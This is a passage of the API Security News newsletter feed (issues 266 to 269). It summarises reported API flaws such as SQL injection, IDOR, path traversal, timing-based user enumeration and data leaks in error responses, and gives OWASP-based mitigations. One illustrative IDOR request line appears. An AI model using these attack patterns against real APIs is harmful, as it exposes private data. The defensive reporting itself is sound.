<p style="font-weight: 400;"><span style="font-weight: 400;">The SQL injection and data exposure issues follow common patterns frequently seen in API-related incidents. OWASP provides well-established guidance for preventing such vulnerabilities, including enforcing strict schema validation on both request and response payloads, and using prepared statements or parameterized queries to mitigate injection risks.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The user enumeration flaw exploited a timing discrepancy in the login API. When a non-existent username is submitted, the API responds immediately with an error. However, if the username exists, the API performs an additional password check before returning a failure, introducing a measurable delay. This timing difference allows attackers to determine which usernames are valid, enabling a user enumeration attack.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">OWASP again offers </span><a href="https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html#authentication-responses" target="_blank" rel="noopener"><span style="font-weight: 400;">guidelines</span></a><span style="font-weight: 400;"> on secure coding practices, with examples, to mitigate the risk from timing attacks. Recommendations include adding protections against brute-force attacks, which help to prevent user enumeration attacks at scale, as have been seen in </span><a href="https://apisecurity.io/issue-240-spoutible-api-leakage-15m-trello-profiles-scraped-api-secret-tokens-leaked/" target="_blank" rel="noopener"><span style="font-weight: 400;">recent cases</span></a><span style="font-weight: 400;"> of mass data scraping through APIs at Trello, Facebook and LinkedIn. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Shopware API Vulnerable to SQL Injection</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Another day, another API vulnerable to SQL injection! </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Shopware provides a self-hosted open-source e-commerce platform written in PHP. One of the platform’s APIs was discovered to be vulnerable to SQL injection. A team of penetration testers </span><a href="https://www.redteam-pentesting.de/en/advisories/rt-sa-2025-001/" target="_blank" rel="noopener"><span style="font-weight: 400;">reviewed</span></a><span style="font-weight: 400;"> the original vulnerability along with the patch subsequently provided by Shopware, and concluded that the patch, in the form of a security plugin, was incomplete and that the platform remained vulnerable to SQL injection. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The problem appears to be that the developer of the security plugin added security controls for the one property that was originally flagged as vulnerable, but didn’t check if other properties in the same API payload were also vulnerable to SQL injection. They were!</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is a good example of why secure by design is a better approach to the “firefighting” method of addressing vulnerabilities as they’re discovered. Rather than scrambling to patch individual instances of SQL injection vulnerabilities found in production, secure by design embeds security into the development process from the start, saving time and effort in the long run.</span></p>
<p>The post <a href="https://apisecurity.io/issue-269-api-security-guidelines-mastering-openapi-security-flaws-in-shopware-and-zabbix-apis/">Issue 269: API Security Guidelines, Mastering OpenAPI, Security Flaws in Shopware and Zabbix APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 268: Cloudflare disables HTTP, Moodle and Flowise API flaws, DevSecOps &#038; API secure design</title>
		<link>https://apisecurity.io/issue-268-cloudflare-disables-http-moodle-and-flowise-api-flaws-devsecops-api-secure-design/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 27 Mar 2025 15:55:19 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11299</guid>

					<description><![CDATA[<p>This week, we focus on secure API design and best practices. We examine Cloudflare’s latest measures to prevent API token exposure, analyze three recent API vulnerabilities affecting an AI platform, a WordPress plugin, and a popular LMS solution, and highlight key articles on DevSecOps and API security best practices. Article: How HTTPS redirects can expose [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-268-cloudflare-disables-http-moodle-and-flowise-api-flaws-devsecops-api-secure-design/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-268-cloudflare-disables-http-moodle-and-flowise-api-flaws-devsecops-api-secure-design/">Issue 268: Cloudflare disables HTTP, Moodle and Flowise API flaws, DevSecOps &#038; API secure design</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we focus on secure API design and best practices. We examine Cloudflare’s latest measures to prevent API token exposure, analyze three recent API vulnerabilities affecting an AI platform, a WordPress plugin, and a popular LMS solution, and highlight key articles on DevSecOps and API security best practices.</span></p>
<h2><span style="font-weight: 400;">Article: How HTTPS redirects can expose API data</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In a March </span><a href="https://blog.cloudflare.com/https-only-for-cloudflare-apis-shutting-the-door-on-cleartext-traffic/" target="_blank" rel="noopener"><span style="font-weight: 400;">blog post</span></a><span style="font-weight: 400;">, Cloudflare announced it will block all API requests made over unsecured HTTP at the network level, ensuring that all client connections use encrypted HTTPS.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Some API servers enforce HTTPS by redirecting HTTP requests to secure endpoints, this method still exposes sensitive data such as API keys or access tokens to potential man-in-the-middle attacks during the initial unencrypted request. </span></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-11300" src="https://apisecurity.io/wp-content/uploads/2025/03/Issue-268-Cloudflare-image-300x218.png" alt="" width="826" height="600" srcset="https://apisecurity.io/wp-content/uploads/2025/03/Issue-268-Cloudflare-image-300x218.png 300w, https://apisecurity.io/wp-content/uploads/2025/03/Issue-268-Cloudflare-image-768x559.png 768w, https://apisecurity.io/wp-content/uploads/2025/03/Issue-268-Cloudflare-image.png 994w" sizes="auto, (max-width: 826px) 100vw, 826px" /></p>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">Source: Cloudflare</span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Despite the widespread adoption of HTTPS, some web applications and APIs remain exposed to data leaks over unsecured HTTP connections</span><b>.</b><span style="font-weight: 400;"> For example, </span><a href="https://vicone.com/blog/how-authentication-and-api-vulnerabilities-undermine-fleet-management-systems" target="_blank" rel="noopener"><span style="font-weight: 400;">research</span></a><span style="font-weight: 400;"> by automotive cybersecurity firm VicOne uncovered companies across the US, Europe, and Asia transmitting cleartext passwords from vehicle tracking systems over non-HTTPS connections, leaving sensitive data vulnerable to interception.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Disabling HTTP ports eliminates this risk, by ensuring that any attempt to connect over HTTP is blocked at the network level, before application-layer data or tokens can be exchanged.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">If your server applications currently rely on HTTP-to-HTTPS redirects, it might be worth considering disabling HTTP ports altogether, to prevent exposure of sensitive API traffic.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: AI platform adds input validation to secure APIs </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Flowise is a popular open-source platform for creating AI agents and orchestrating LLM flows. A researcher recently uncovered an API flaw that allowed unauthenticated users to upload or overwrite arbitrary files on the platform. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The researcher shared a detailed </span><a href="https://medium.com/@attias.dor/the-burn-notice-part-2-5-5-flowise-pre-auth-arbitrary-file-upload-cve-2025-26319-0d4194a34183" target="_blank" rel="noopener"><span style="font-weight: 400;">analysis</span></a><span style="font-weight: 400;"> of the API vulnerability. The API allows users to upload files to the platform. The request includes two user-supplied path parameters values. Those path parameters were later used in the code to construct a filepath to the location on the server where the file is stored. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">But the parameter values were not checked and validated by the API. This gives room for a malicious user to set malicious values, and when it comes to file uploads the path traversal pattern is a common tactic used to access unauthorized files and locations on a server. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In this case the API vulnerability allowed a user to overwrite critical files on the server at unauthorized locations on the file system. Flowise have since fixed the API flaw to remove the vulnerability by adding </span><a href="https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7" target="_blank" rel="noopener"><span style="font-weight: 400;">proper input validation</span></a><span style="font-weight: 400;"> in the API code, ensuring the vulnerable user-supplied parameters can only be the expected UUID format.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Teams can mitigate common API vulnerabilities by integrating robust input validation at the initial design and implementation phases for API development. This proactive approach helps eliminate weaknesses that attackers frequently exploit.</span></p>
<h2><span style="font-weight: 400;">Article: The benefits of starting with an OpenAPI description</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In a </span><a href="https://apisyouwonthate.com/blog/a-developers-guide-to-api-design-first/" target="_blank" rel="noopener"><span style="font-weight: 400;">blog post</span></a><span style="font-weight: 400;"> on APIsYouWontHate.com, Phil Sturgeon makes a strong case for API first design. The post compares and contrasts the code-first and design-first workflows for API development, and describes some of the negative implications of rushing to the coding step as fast as possible.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">One of the main pushbacks we hear from teams who are considering a design-first approach is all the extra time teams must invest in carefully preparing a detailed OpenAPI contract with enough specificity to clearly describe an API&#8217;s design intent.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">However, as noted in his post, Sturgeon argues that this upfront investment during the early design phase reaps significant time savings throughout the rest of the API’s lifecycle. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">There is a long list of additional benefits to teams who adopt a design-first approach, such as leveraging the OpenAPI contract to automate functional and vulnerability tests, API code or mock services. Standardizing the API documentation quality also helps to reduce inefficiencies and improves the experience for API consumers to use and integrate an API. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">If you’re still on the fence about moving to design-first in your API team, this article must just tip the balance!</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Data whitelisting and API injection attacks</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A researcher recently uncovered an API vulnerability in a WordPress plugin that exposed WordPress sites to SQL injection attacks against the site database.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The researcher shared an </span><a href="https://abrahack.com/posts/gamipress-sqli/" target="_blank" rel="noopener"><span style="font-weight: 400;">account</span></a><span style="font-weight: 400;"> of discovering the vulnerability in the plugin source code, where HTTP request parameters were passed unsafely to an SQL query. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">It’s worth noting that the API design allows users to select database table names. This is inherently insecure, as highlighted in the </span><a href="https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html" target="_blank" rel="noopener"><span style="font-weight: 400;">OWASP SQL Prevention Cheat Sheet</span></a><span style="font-weight: 400;">:</span></p>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">“WARNING: Using user parameter values to target table or column names is a symptom of poor design and a full rewrite should be considered if time allows.”</span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The solution applied in this case was to enforce whitelist validation on the vulnerable parameters, so that only valid table names would be accepted by the API and malicious queries rejected by default. This helps to reduce the risk of vulnerability exploitation, but doesn’t remove the underlying vulnerability in the code. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Using prepared statements or properly constructed stored procedures is the recommended way to safely handle user supplied data in database queries, though whitelisting and input validation also offers a defense-in-depth approach to secure APIs against injection attacks.</span></p>
<h2><span style="font-weight: 400;">Article: DevSecOps with API Security by Design </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">With the rise of frameworks, automation, and AI-powered tools, developers can now build and deploy APIs in a matter of hours, days at most. In teams following DevOps practices, developers often have full autonomy to deploy their own APIs with little to no oversight or security checks.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This rapid delivery model is great for meeting the ever-increasing demand for API-based applications and integrations. However, in software development, speed often comes at the cost of security. The result is APIs going live with critical vulnerabilities, exposing organizations to data breaches, remediation headaches, and compliance risks.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recent DZone </span><a href="https://dzone.com/articles/building-security-into-design-phase" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> highlights practical approaches to tackling these security challenges by embedding security into the early stages of API design, bringing the ‘Sec’ into DevSecOps. The article advocates for integrating threat modeling as a key design step, alongside reviewing API contracts and incorporating static analysis into the build pipeline.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">These insights underscore the importance of shifting security left in the API development lifecycle. By proactively identifying risks before implementation, teams can significantly reduce security flaws while maintaining development velocity.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Check the API Error Response for Leakage</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">This week I came across a </span><a href="https://moodle.org/mod/forum/discuss.php?d=467084" target="_blank" rel="noopener"><span style="font-weight: 400;">security announcement</span></a><span style="font-weight: 400;"> for the Moodle LMS platform reporting an API vulnerability. According to the announcement one of the APIs on the platform was leaking user data in the API’s error response. A user did not need to be authenticated on the platform to view the leaked data of other users. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The exposed user data included the user&#8217;s name, e-mail address, hashed password, last login IP, and some metadata. The term “some metadata” could of course mean many things, though leaking email addresses and hashed passwords is already a serious problem. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A similar vulnerability made headlines last year involving a vulnerable API from the social media company Spoutible. We covered that case in an </span><a href="https://apisecurity.io/issue-240-spoutible-api-leakage-15m-trello-profiles-scraped-api-secret-tokens-leaked/" target="_blank" rel="noopener"><span style="font-weight: 400;">earlier newsletter</span></a><span style="font-weight: 400;">.  In that incident similar user data was exposed in the API response, including hashed passwords and also codes and secrets for two-factor authentication. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">API security often focuses on protecting against malicious data on the inbound request. However as this case and previous cases highlight, API security must also include filtering data in the outbound request, to ensure all data returned in the API response is expected, valid and authorized. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Schema validation on both the request and response payloads, including error response messages, can help to prevent painful data exposures from APIs.</span></p>
<h2><span style="font-weight: 400;">Article: API Design Matters for Security</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Finally this week, we highlight a recent </span><a href="https://apidesignmatters.substack.com/p/from-here-to-there-from-where-to" target="_blank" rel="noopener"><span style="font-weight: 400;">post</span></a><span style="font-weight: 400;"> by David Biesack from APIDesignMatters on best practices for structuring query parameters in Web APIs.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">David describes using query parameters to “parameterize queries”, by filtering API responses to return only relevant resources. He breaks down multiple design patterns for structuring query strings, whether handling single values, field-value pairs, or data ranges, offering practical guidance for API standardization.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The post also shares an example of defining query parameters formally using the OpenAPI Specification. Well-documented query structures not only improve consistency but also enable automated security testing. Attackers frequently exploit query parameters for injection attacks and business logic abuses, making strict design patterns a crucial defense.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">By adopting consistent query conventions and enforcing valid input constraints, developers can make APIs more secure by design, another strong argument for why API design matters!</span></p>
<p>The post <a href="https://apisecurity.io/issue-268-cloudflare-disables-http-moodle-and-flowise-api-flaws-devsecops-api-secure-design/">Issue 268: Cloudflare disables HTTP, Moodle and Flowise API flaws, DevSecOps &#038; API secure design</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 267: AI to replace Pentesters, Radware Threat report, API bugs at Medefer and Zitadel, API holes in OpenBanking</title>
		<link>https://apisecurity.io/issue-267-ai-to-replace-pentesters-radware-threat-report-api-bugs-at-medefer-and-zitadel-api-holes-in-openbanking/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 13 Mar 2025 16:23:32 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11291</guid>

					<description><![CDATA[<p>This week, we share the Radware 2024 threat report highlighting APIs as a primary target of attacks. We also look at API vulnerabilities reported in the Medefer health platform and Zitadel’s identity management solution. The Hacker News investigates if Pentesters are about to go extinct, and finally we have an article on Open Banking and [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-267-ai-to-replace-pentesters-radware-threat-report-api-bugs-at-medefer-and-zitadel-api-holes-in-openbanking/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-267-ai-to-replace-pentesters-radware-threat-report-api-bugs-at-medefer-and-zitadel-api-holes-in-openbanking/">Issue 267: AI to replace Pentesters, Radware Threat report, API bugs at Medefer and Zitadel, API holes in OpenBanking</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we share the Radware 2024 threat report highlighting APIs as a primary target of attacks. We also look at API vulnerabilities reported in the Medefer health platform and Zitadel’s identity management solution. The Hacker News investigates if Pentesters are about to go extinct, and finally we have an article on Open Banking and API security challenges in APAC.</span></p>
<h2><span style="font-weight: 400;">Industry Report: Radware report highlights API vulnerabilities</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Radware has published a new industry </span><a href="https://www.radware.com/threat-analysis-report/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> analyzing attack trends in 2024. The section on “Web Application and API Threats” distinguishes API attacks primarily targeting API business logic or core functionality. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This represents a unique challenge for API security, as attacks often target bugs specific to the functionality or data of each API. This makes it extremely difficult to apply generic security controls to effectively protect APIs against attacks. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In the report, Radware noted a 41% increase in Web Application and API attacks since 2023. Vulnerability exploitation accounts for over a third of all malicious requests. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The lack of proper API documentation is also highlighted as an indication of insufficient security or unmanaged APIs, which are frequently targeted by hackers. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Medical records exposed by unsecured API </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The UK’s National Health Service provides an electronic referral system through an ecosystem of online healthcare providers. According to a recent </span><a href="https://www.digitalhealth.net/2025/03/medefer-refutes-claims-that-security-flaw-left-patient-data-vulnerable/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;">, a whistleblower from Medefer, a company participating in the e-referral system, claimed that an unprotected API exposed medical records that were previously transferred to Medefer from the systems of the NHS.</span></p>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">“When a patient is referred to Medefer, the firm receives patient data from e-RS or the NHS Spine to make it available to medics, who provide online consultations”</span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Apparently the vulnerable API was accessible without any authentication. Although the company claimed to have fixed the issue within 48 hours, the whistleblower, a software testing contractor for Medefer, suggested the flaw in the company’s API may have existed for six years, according to reporting on </span><a href="https://www.computerweekly.com/news/366620174/NHS-investigating-how-API-flaw-exposed-patient-data" target="_blank" rel="noopener"><span style="font-weight: 400;">ComputerWeekly.com</span></a><span style="font-weight: 400;">. </span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;">The complexity of supply chains and ecosystems poses a major challenge for API security as threat actors will target the weakest link in the chain to compromise the entire system. At a minimum, access to private data via APIs should be protected by appropriate authentication and authorization controls. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Medefer indicated that penetration tests conducted by a third party a few months earlier failed to uncover the API vulnerability. Either the API vulnerability was recently introduced, or the penetration tests left a lot to be desired!</span></p>
<h2><span style="font-weight: 400;">Article: Will AI replace Pentesters?</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Speaking of pentesters, an </span><a href="https://thehackernews.com/2025/03/pentesters-is-ai-coming-for-your-role.html" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> on The Hacker News asks the question if AI is about to replace humans by fully automating penetration testing. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A similar argument has been made about the impending demise of software developers at the hands of AI, although the quality of code generated by AI is not without its </span><a href="https://thenewstack.io/more-ai-more-problems-for-software-developers-in-2025/" target="_blank" rel="noopener"><span style="font-weight: 400;">discontents</span></a><span style="font-weight: 400;">.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Having reviewed hundreds of POCs and bug bounty reports while preparing the APISecurity.io newsletter each month, two impressive characteristics I notice in pentesters and hackers are persistence and ingenuity. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">While it&#8217;s easy to imagine an AI agent beating a human in terms of persistence, the ingenuity and instinct sometimes required to uncover a software security flaw are the result of years of experience probing and testing for signs of mistakes made by software developers. Which raises the question: can an AI know us better than we know ourselves?</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Thankfully, the article concludes that rather than replacing pentesters, AI will be a very useful tool in the pentesters toolbox to automate tedious tasks, leaving humans to focus on the more high-brow tasks. It&#8217;s an interesting article and certainly worth a read! </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Broken API Authorization exposes Zitadel IAM  </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Zitadel is a popular open-source identity and access management solution. An authorization vulnerability was recently </span><a href="https://cybersecuritynews.com/zitadel-idor-vulnerabilities/" target="_blank" rel="noopener"><span style="font-weight: 400;">reported</span></a><span style="font-weight: 400;"> on 12 of the platform&#8217;s API endpoints used for administrative functions. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Insufficient authorization checks allowed users with standard, non administrative privileges to use administrator level functions, including the ability to modify LDAP authentication settings to disable security controls and takeover other accounts.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">API vulnerabilities that allow unauthorized access to privileged functionality are common enough to rank fifth in the OWASP API Security Top 10 list: </span><a href="https://owasp.org/API-Security/editions/2023/en/0xa5-broken-function-level-authorization/" target="_blank" rel="noopener"><span style="font-weight: 400;">API5: Broken Functional Level Authorization</span></a><span style="font-weight: 400;">. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Recommendations for prevention include denying access by default, and carefully implementing role-based access control. This is also the approach taken by the Zitadel team to address and resolve the API vulnerability. </span></p>
<h2><span style="font-weight: 400;">Article: API Security and OpenBanking in APAC</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Open Banking leverages APIs to enable third-party providers (TPPs) like fintechs, payment services, and other financial institutions to gain authorized access to a bank’s customer data and provide value-added services.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">To underscore the important role of APIs in OpenBanking, it’s worth taking a look at the UK Open Banking </span><a href="https://www.openbanking.org.uk/api-performance/" target="_blank" rel="noopener"><span style="font-weight: 400;">website</span></a><span style="font-weight: 400;"> which shares statistics on monthly API traffic for Open Banking transactions. For example, the site states that 1.9 billion successful API calls were made in the UK in January 2025 alone (approximately 61 million API calls per day). </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In Asia-Pacific, banks, payment gateways and fintechs also make extensive use of APIs as part of the expanding financial services ecosystem in the region. An </span><a href="https://www.theregister.com/2025/03/04/plugging_the_holes_in_open/" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> on The Register website discusses the challenges of securing a complex system consisting of thousands of interconnected APIs managed by many different API providers. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">“The security of the ecosystem is only as strong as its weakest link”</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The article suggests several essential API protection mechanisms to deploy to strengthen Open Banking systems:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Enforce multi-factor authentication and object-level authorization on every API request</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Block malicious data and injection attacks with API input validation</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Validate API response data to prevent unauthorized data leaks</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">These are good recommendations for any API that provides access to private resources, as the same API vulnerabilities and attacks occur frequently across all industries that use APIs.</span></p>
<p>The post <a href="https://apisecurity.io/issue-267-ai-to-replace-pentesters-radware-threat-report-api-bugs-at-medefer-and-zitadel-api-holes-in-openbanking/">Issue 267: AI to replace Pentesters, Radware Threat report, API bugs at Medefer and Zitadel, API holes in OpenBanking</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 266: API governance, KYC leak at the Post Office, SQL injection bug in Fintech API, API best practices</title>
		<link>https://apisecurity.io/issue-266-api-governance-kyc-leak-at-the-post-office-sql-injection-bug-in-fintech-api-api-best-practices/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 27 Feb 2025 16:55:27 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11287</guid>

					<description><![CDATA[<p>This week, we dive into API governance and API best practices, analyze a recently reported IDOR vulnerability at the Indian Post Office, and examine an SQL injection bug in the API of a popular Fintech platform. Finally, we review an API authorization vulnerability in Gitlab’s password reset mechanism.  Article: How Netflix and HSBC implement API [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-266-api-governance-kyc-leak-at-the-post-office-sql-injection-bug-in-fintech-api-api-best-practices/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-266-api-governance-kyc-leak-at-the-post-office-sql-injection-bug-in-fintech-api-api-best-practices/">Issue 266: API governance, KYC leak at the Post Office, SQL injection bug in Fintech API, API best practices</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we dive into API governance and API best practices, analyze a recently reported IDOR vulnerability at the Indian Post Office, and examine an SQL injection bug in the API of a popular Fintech platform. Finally, we review an API authorization vulnerability in Gitlab’s password reset mechanism. </span></p>
<h2><span style="font-weight: 400;">Article: How Netflix and HSBC implement API Governance </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recent </span><a href="https://thenewstack.io/api-governance-using-patterns-from-paypal-netflix-and-more/" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> on The New Stack argues that API teams should establish a formal governance pattern early, before an informal one takes root. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">API governance provides a structured framework of policies and processes to guide API design, development, security, and maintenance. However, different organizations take different approaches, often influenced by their culture and operational needs.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The article reviews three key API governance patterns, analyzing their pros and cons through real world case studies of companies like Netflix, Paypal, HSBC and the Financial Times.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Some key takeaways:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Netflix’s Central Design Authority (CDA) relied on manual API reviews by a dedicated team. While this ensured strong oversight, it quickly became a bottleneck as API development scaled. Automating design checks could have helped ease this burden.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">HSBC’s federated model of API governance introduced inconsistencies due to the varying levels of experience of API champions across the federated team. Here, increased  automation helped to bring more consistency and improve governance. </span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">For a deeper dive into API governance patterns and their real-world impact, this article is well worth a read!</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Lessons from India Post Office API Leaks</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A security researcher recently uncovered an API vulnerability in the <a href="https://gbhackers.com/indian-post-office-portal-leak/" target="_blank" rel="noopener">India Post Office website</a> that exposed unauthorized access to sensitive Know Your Customer (KYC) information. The vulnerability highlights common pitfalls in API security practices, particularly around authentication and authorization.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">One key takeaway from this case is how authorization was inconsistently applied. While the India Post website required users to log in to access their accounts, the underlying API calls to the backend did not require any credentials. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This suggests the API developers relied on the website for authentication, potentially assuming that all API requests would originate from the trusted website and therefore additional authorization checks directly at the API level were unnecessary. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Compounding the issue, the API was also found to be vulnerable to Insecure Direct Object Reference (IDOR). The API used a document ID parameter to retrieve KYC information:</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">GET /api/kyc/document?document_id=125678</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">If a malicious actor modified the document_id value to another customer’s document ID, the API would return the corresponding KYC information without verifying whether the requester was authorized to access that document. This lack of proper authorization controls made sensitive customer data easily accessible.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This case serves as a critical reminder for teams to enforce authentication and resource based authorization at the API, and never rely on client side security. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: SQLi bug in Financial Services Platform API</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Fineract is a popular open source platform for Financial Services, providing an Open API based core banking solution. A recent </span><a href="https://cybersecuritynews.com/apache-fineract-sql-injection-vulnerability/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> revealed that some of the platform&#8217;s REST APIs were vulnerable to SQL injection exploits. Fineract developers addressed the vulnerability by introducing a SQL Validator component, which, according to the vulnerability report: “allows us to validate and protect against nearly all potential SQL injection attacks“ </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">SQL injection remains a common API security vulnerability, despite the fact that effective preventative measures are well-documented and widely promoted. </span><a href="https://owasp.org/www-community/attacks/SQL_Injection#description" target="_blank" rel="noopener"><span style="font-weight: 400;">OWASP</span></a><span style="font-weight: 400;"> highlights that successful SQL injection attacks occur when two conditions are met:</span></p>
<ol style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">An unintended data enters a program from an untrusted source.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">The data is used to dynamically construct a SQL query</span></li>
</ol>
